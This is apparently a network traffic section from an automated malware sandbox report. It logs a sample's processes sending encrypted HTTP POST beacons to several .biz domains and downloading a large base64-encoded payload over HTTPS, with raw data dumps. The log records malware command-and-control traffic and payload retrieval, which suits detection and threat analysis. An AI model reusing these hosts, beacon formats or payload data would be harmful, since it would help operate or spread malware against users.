                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.306994915 CET778OUTData Raw: 8c b9 07 c7 fd af 8b 4d fe 02 00 00 fa 23 c8 90 7b bc 76 90 96 45 e9 06 b3 6c 41 c5 71 4f 34 8a fd 36 4a 67 dc e5 e4 2e 60 25 6d 55 74 5c b5 59 5c b3 ef 50 bd 25 95 90 16 90 d5 75 40 59 5b 01 2b 61 ad 01 69 67 03 d3 57 68 2f 51 e0 a4 c2 a4 f6 2a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: M#{vElAqO46Jg.`%mUt\Y\P%u@Y[+aigWh/Q*6 RbMU=5lsdco]TY7')KgxFPL,!1,KONd\#E5VoNho8,k(*5^lQ
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.465893984 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:09 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=b1b78fdb1120f4580396c0aa52f5ec0b|8.46.123.75|1732605369|1732605369|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    122192.168.2.105010818.246.231.120806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.763420105 CET342OUTPOST /e HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.763473034 CET778OUTData Raw: 91 85 40 b6 10 c1 a2 90 fe 02 00 00 52 a7 6f a4 0b c9 96 d4 eb 08 fb 6d 4c 3c 31 ad 16 2a e3 50 53 8c 00 a3 29 5e 71 0e 39 56 5c 54 f1 e2 d6 77 a2 7c d1 61 22 a4 bd ff ea c0 09 3e c5 ba e6 6d e2 59 6a 8f 10 fa 05 ec 36 77 c5 0e 15 47 b2 b1 d5 04
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: @RomL<1*PS)^q9V\Tw|a">mYj6wG:M[<\Z/5)4w2|o\8CUh@3zB+\I:.g hw}KNeKfa7h[^#;c0mdU~CZ}2J
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.174073935 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=5f7ad75adeb6989086de543e9eaf9b46|8.46.123.75|1732605370|1732605370|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    123192.168.2.105010944.221.84.105807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.446607113 CET352OUTPOST /isfkmckm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.446607113 CET834OUTData Raw: 43 30 fc 4c f5 24 47 39 36 03 00 00 84 32 a4 9c a6 73 eb ae d1 d0 35 b0 ca a6 c3 c6 e0 13 6b 74 7c 83 17 4d ec 1a f0 71 87 bf 53 b7 6b 1f d0 4f 17 19 e5 22 56 69 63 f1 4a ed 55 27 77 93 87 1b 71 5d 57 45 8f 46 cf 75 ee e1 22 fc 60 c6 a9 04 d4 56
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: C0L$G962s5kt|MqSkO"VicJU'wq]WEFu"`VcUIXb{l_MQO_;W\A#qHa%dR{jY;f$rcwr,csWVkaZzp4$}_>_,t
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.578910112 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=3a9a879262d00b3246db067f6b2c5826|8.46.123.75|1732605371|1732605371|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    124192.168.2.105011044.221.84.105806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.517330885 CET346OUTPOST /xc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.517457962 CET778OUTData Raw: 96 05 39 04 98 71 db ad fe 02 00 00 1d e8 bb 3d 69 a6 df 9c 13 77 86 13 df fe 76 a5 8b 90 a7 62 74 01 d9 d6 37 df d1 ef 4a e5 7d a2 4b 67 ae 4a 72 a3 ea a2 92 67 f9 9c c6 1d 98 84 9b 09 3a ba 02 d8 1c fc c7 82 72 65 5e c4 7a f1 e8 88 51 a4 dc 41
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 9q=iwvbt7J}KgJrg:re^zQAS)0rtP{W'gG|V"&~uqmBo!S Bj^Xun8%uFY!p+~]%bY^yV?q:t`4o
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.667970896 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=fec4183d8a417f0fd8742197dceda1ac|8.46.123.75|1732605372|1732605372|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    125192.168.2.105011154.244.188.177807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.808953047 CET358OUTPOST /fwkhevjnywgrfjvo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.809279919 CET834OUTData Raw: 00 8e 80 ca be db 4d 8a 36 03 00 00 3d c1 00 00 c5 26 64 e9 9d a2 7f da 9d 12 09 66 27 dc f0 71 c1 bf f7 08 aa 95 6d 43 7b c4 4e 72 50 43 4c 24 66 66 22 5d 3b 27 db 7b 4e 6a 74 9d 76 18 61 43 8a 8a cb 0b 17 90 9f 9a c2 ec 4a d2 f1 03 9e 53 2f 9e
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: M6=&df'qmC{NrPCL$ff"];'{NjtvaCJS/]\m|qG+YLC*_i)1l=gh5Dtcl[y_zihU>T(mj+p-I+X5_-*;BQeOdfQNJ)`| s
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:14.157366991 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=a6ee343dbc2d39727ad9b0d2a41e3385|8.46.123.75|1732605373|1732605373|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    126192.168.2.105011254.244.188.177806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:13.129847050 CET346OUTPOST /qqnj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:13.129847050 CET778OUTData Raw: 51 4d db df 3f 8c 4d 3f fe 02 00 00 ff d1 9b 31 39 f7 e5 84 55 82 80 7f b0 90 f6 a9 49 76 0a db 6e 18 9e f1 80 2d 3f c6 90 93 00 66 ef 4d c5 9b b5 52 7c ed d7 25 43 c2 bc 82 8a 41 07 68 ae 00 c8 82 3f fe 87 20 2f 2d 57 db 3f cc 3b b8 5d 26 cb 8f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: QM?M?19UIvn-?fMR|%CAh? /-W?;]&x:G70L#wnqDKi?E`#>~9'W(*a;Dr&^bIS}?mP>T%t_j!t3J0t DQL"c@O_?ont=TGZxh
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:14.536930084 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:14 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=2f6407e22654de746f52a84d1568af01|8.46.123.75|1732605374|1732605374|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    0192.168.2.1049708198.252.105.914437852C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:12 UTC162OUTGET /yak2/233_Juqmtmyadyy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                                                                                                                                    Host: gxe0.com
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    last-modified: Thu, 14 Nov 2024 22:46:27 GMT
                                                                                                                                                                                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                    content-length: 3182288
                                                                                                                                                                                                                                                                                                                                                    date: Tue, 26 Nov 2024 07:12:12 GMT
                                                                                                                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC1003INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 66 47 78 6f 54 45 43 41 55 4a 42 55 57 49 52 67 68 4a 79 59 58 48 79 59 51 47 68 4d 55 44 67 34 57 4a 52 30 65 46 41 34 57 49 42 34 53 44 67 38 55 48 78 6b 4f 49 43 55 61 48 61 61 75 70 56 6b 6a 70 37 46 4c 56 53 49 65 47 69 45 61 4a 67 34 52 4a 69 61 6d 72 71 56 5a 49 36 65 78 53 31 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: pq6lWSOnsUsfGxoTECAUJBUWIRghJyYXHyYQGhMUDg4WJR0eFA4WIB4SDg8UHxkOICUaHaaupVkjp7FLVSIeGiEaJg4RJiamrqVZI6exS156eXJvX3NjdHVgd2BmZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW1
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC14994INData Raw: 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31 31 5a 46 78 64 63 32 31 31 58 31 31 78 62 57 35 7a 58 6e 68 74 58 32 52 35 58 46 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 72 42 53 61 43 31 72 59 32 47 4e 5a 56 39 77 33 6f 56 6d 37 57 78 68 64 7a 6c 33 61 33 5a 67 46 47 4a 32 62 58 4d 4f 61 31 78 37 65 37 52 66 5a 7a 78 52 63 43 6e 43 4f 57 6f 34 42 5a 57 74 39 6d 77 72 30 54
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: mZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW11ZFxdc211X11xbW5zXnhtX2R5XF56eXJvX3NjdHVgd2BmZXZeZW95crBSaC1rY2GNZV9w3oVm7Wxhdzl3a3ZgFGJ2bXMOa1x7e7RfZzxRcCnCOWo4BZWt9mwr0T
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 68 68 67 61 33 56 6c 62 73 57 45 79 75 6e 73 4c 6e 36 54 38 70 4c 2b 48 58 5a 6c 4f 4c 78 63 56 39 51 77 66 51 62 34 6b 57 71 72 69 59 4c 76 72 74 67 74 2f 50 44 4c 30 6c 57 4d 6d 2b 37 2b 6a 4d 4a 68 64 6a 49 61 62 47 4e 35 32 45 71 61 38 72 77 59 41 6c 68 7a 48 35 4f 4f 36 55 39 37 2f 36 56 37 33 4b 4b 69 4b 68 6d 74 58 5a 55 69 44 55 64 70 4e 6e 39 57 2b 65 58 69 4c 32 46 31 63 55 67 58 69 30 62 64 45 74 32 36 4c 39 2f 46 41 49 4d 6a 64 59 59 57 59 6c 56 66 4b 47 77 70 6d 6e 6d 30 63 6e 70 67 59 6d 61 79 36 62 52 70 4c 68 73 64 6d 42 72 44 33 45 50 4a 30 75 54 53 68 48 62 53 6a 74 2f 68 61 72 6b 71 5a 68 32 4b 4c 64 39 75 6a 42 45 6b 4f 48 2b 32 6e 72 54 70 45 32 44 56 62 45 35 51 2b 41 54 52 54 6d 35 50 50 63 62 5a 6e 38 63 7a 4f 43 59 4c 2f 58 74 79
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: hhga3VlbsWEyunsLn6T8pL+HXZlOLxcV9QwfQb4kWqriYLvrtgt/PDL0lWMm+7+jMJhdjIabGN52Eqa8rwYAlhzH5OO6U97/6V73KKiKhmtXZUiDUdpNn9W+eXiL2F1cUgXi0bdEt26L9/FAIMjdYYWYlVfKGwpmnm0cnpgYmay6bRpLhsdmBrD3EPJ0uTShHbSjt/harkqZh2KLd9ujBEkOH+2nrTpE2DVbE5Q+ATRTm5PPcbZn8czOCYL/Xty
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 6e 65 53 66 4d 35 35 67 71 4c 6c 4d 61 58 49 68 6f 73 71 74 44 4c 52 65 6d 74 32 52 6d 69 7a 55 63 4a 42 49 73 41 6a 76 57 44 54 4e 59 72 6e 45 2f 31 58 71 31 71 5a 6e 72 72 4a 68 49 73 35 68 44 4f 2f 65 2b 59 55 39 48 79 43 6a 5a 7a 53 48 38 59 6a 34 55 2f 78 47 6a 38 38 32 6f 53 70 36 4d 41 51 62 72 2b 7a 50 68 35 33 70 2b 32 71 48 59 37 39 63 49 6e 58 38 62 65 67 6e 46 39 70 58 41 41 6f 67 55 72 33 46 2f 2b 6e 4f 65 70 4c 43 59 71 34 46 6e 70 67 71 4f 6b 5a 35 35 64 57 37 56 4c 2f 4d 67 76 59 5a 51 31 32 62 58 62 77 45 48 50 54 38 79 79 4c 63 4c 69 53 71 65 37 64 4f 4b 4f 54 39 61 36 73 65 6d 74 6f 43 71 64 6b 6c 74 38 68 74 6e 44 70 4e 56 70 5a 2f 36 51 64 6c 6d 66 57 63 37 30 31 72 69 78 57 4d 6e 32 62 69 31 35 2b 61 69 65 35 53 36 67 49 6c 39 4a 6a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: neSfM55gqLlMaXIhosqtDLRemt2RmizUcJBIsAjvWDTNYrnE/1Xq1qZnrrJhIs5hDO/e+YU9HyCjZzSH8Yj4U/xGj882oSp6MAQbr+zPh53p+2qHY79cInX8begnF9pXAAogUr3F/+nOepLCYq4FnpgqOkZ55dW7VL/MgvYZQ12bXbwEHPT8yyLcLiSqe7dOKOT9a6semtoCqdklt8htnDpNVpZ/6QdlmfWc701rixWMn2bi15+aie5S6gIl9Jj
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 70 32 70 62 59 66 5a 2b 36 33 55 78 64 34 51 69 64 51 6d 4e 78 68 37 4c 65 47 74 30 34 32 5a 44 6d 72 4c 6f 4e 70 6d 63 59 58 2f 73 6a 71 67 75 42 6c 38 32 62 69 7a 68 39 73 78 2b 43 31 4b 6d 4f 52 59 59 4b 64 50 49 6d 35 76 7a 68 2b 67 36 43 6b 57 64 62 61 7a 68 78 52 44 72 2f 57 43 31 73 32 55 5a 4e 37 32 66 54 38 55 61 2b 52 64 56 76 6d 33 75 52 77 75 4f 64 4a 70 55 66 4a 70 6c 6d 50 4a 6d 48 76 6c 6d 66 52 4f 55 2f 4d 6b 43 69 44 45 71 43 7a 74 56 30 76 42 57 67 73 54 77 49 33 2b 59 74 56 77 54 56 42 4b 6f 62 65 70 61 4f 6a 61 6d 41 4e 37 30 2f 4b 53 74 66 6c 49 67 70 46 2f 73 65 32 57 67 31 4e 63 63 70 32 65 32 78 7a 6a 55 6e 71 44 62 64 38 41 77 72 30 69 39 67 55 6a 58 44 30 65 46 62 32 4a 4a 6e 56 6d 4c 64 46 56 6a 76 51 57 47 43 6e 44 7a 47 4c 4a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: p2pbYfZ+63Uxd4QidQmNxh7LeGt042ZDmrLoNpmcYX/sjqguBl82bizh9sx+C1KmORYYKdPIm5vzh+g6CkWdbazhxRDr/WC1s2UZN72fT8Ua+RdVvm3uRwuOdJpUfJplmPJmHvlmfROU/MkCiDEqCztV0vBWgsTwI3+YtVwTVBKobepaOjamAN70/KStflIgpF/se2Wg1Nccp2e2xzjUnqDbd8Awr0i9gUjXD0eFb2JJnVmLdFVjvQWGCnDzGLJ
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 6c 52 6b 30 52 51 4c 57 67 66 47 58 71 4c 6a 64 58 66 34 39 49 4e 63 43 62 4a 4f 30 77 73 68 61 35 6e 2b 68 47 2f 68 55 31 32 6a 56 7a 66 49 69 36 42 45 71 48 35 2f 2f 46 6c 75 6a 75 2f 49 6b 6c 51 50 78 6e 55 41 72 30 74 6a 30 78 73 67 45 69 75 33 32 51 48 75 59 37 31 4d 66 52 6d 35 69 30 5a 61 59 71 42 78 69 71 49 4b 34 50 48 78 66 48 48 46 44 61 4f 4c 2b 6e 54 79 56 77 6b 77 63 48 4d 42 6f 51 47 6a 49 59 77 67 77 65 50 65 30 73 68 37 51 57 59 5a 7a 77 48 67 48 65 4e 54 79 51 5a 74 65 4a 31 79 75 63 56 6e 59 58 70 79 65 47 62 4b 53 30 4f 69 41 76 43 41 6f 76 4e 76 67 63 76 50 35 57 35 74 50 46 39 38 6f 43 49 77 2f 56 6c 6e 58 70 75 6f 4c 76 30 4a 74 67 59 46 65 67 76 32 70 4e 7a 71 34 37 35 39 4c 6d 33 39 59 43 53 65 75 38 6f 54 42 6d 6a 39 4c 48 50 72
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lRk0RQLWgfGXqLjdXf49INcCbJO0wsha5n+hG/hU12jVzfIi6BEqH5//Fluju/IklQPxnUAr0tj0xsgEiu32QHuY71MfRm5i0ZaYqBxiqIK4PHxfHHFDaOL+nTyVwkwcHMBoQGjIYwgwePe0sh7QWYZzwHgHeNTyQZteJ1yucVnYXpyeGbKS0OiAvCAovNvgcvP5W5tPF98oCIw/VlnXpuoLv0JtgYFegv2pNzq4759Lm39YCSeu8oTBmj9LHPr
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 48 39 68 65 71 50 59 36 4a 2b 6c 49 36 50 48 5a 33 58 59 67 34 77 31 38 50 35 77 65 45 47 75 32 74 42 6c 45 74 76 37 62 59 76 79 33 45 4e 7a 56 45 61 61 51 54 34 44 39 49 67 68 57 5a 5a 53 6a 58 4e 74 4d 47 78 5a 54 4a 42 72 77 49 44 51 6c 37 78 30 30 58 50 6c 50 4e 6a 62 7a 6f 7a 4a 36 4a 4e 73 63 35 71 6b 32 69 43 79 38 35 45 50 31 4b 52 46 75 48 39 2f 42 4c 76 6c 53 41 6b 37 32 56 78 57 65 4d 58 35 54 52 30 2b 47 4e 34 79 6b 32 74 74 62 59 65 33 74 77 4c 36 4f 62 73 43 77 56 64 43 33 6d 33 46 4c 70 52 33 62 4d 62 32 57 32 4f 62 42 42 78 44 42 55 4f 62 70 2b 6a 36 58 54 79 43 6d 2b 52 59 54 57 56 45 53 6b 42 6c 66 67 2b 71 56 47 50 68 61 69 74 54 2b 6a 32 47 45 47 36 6a 2b 4d 61 39 38 77 4d 7a 42 33 45 79 54 75 50 49 75 5a 4b 57 4a 58 59 48 6d 76 46 70
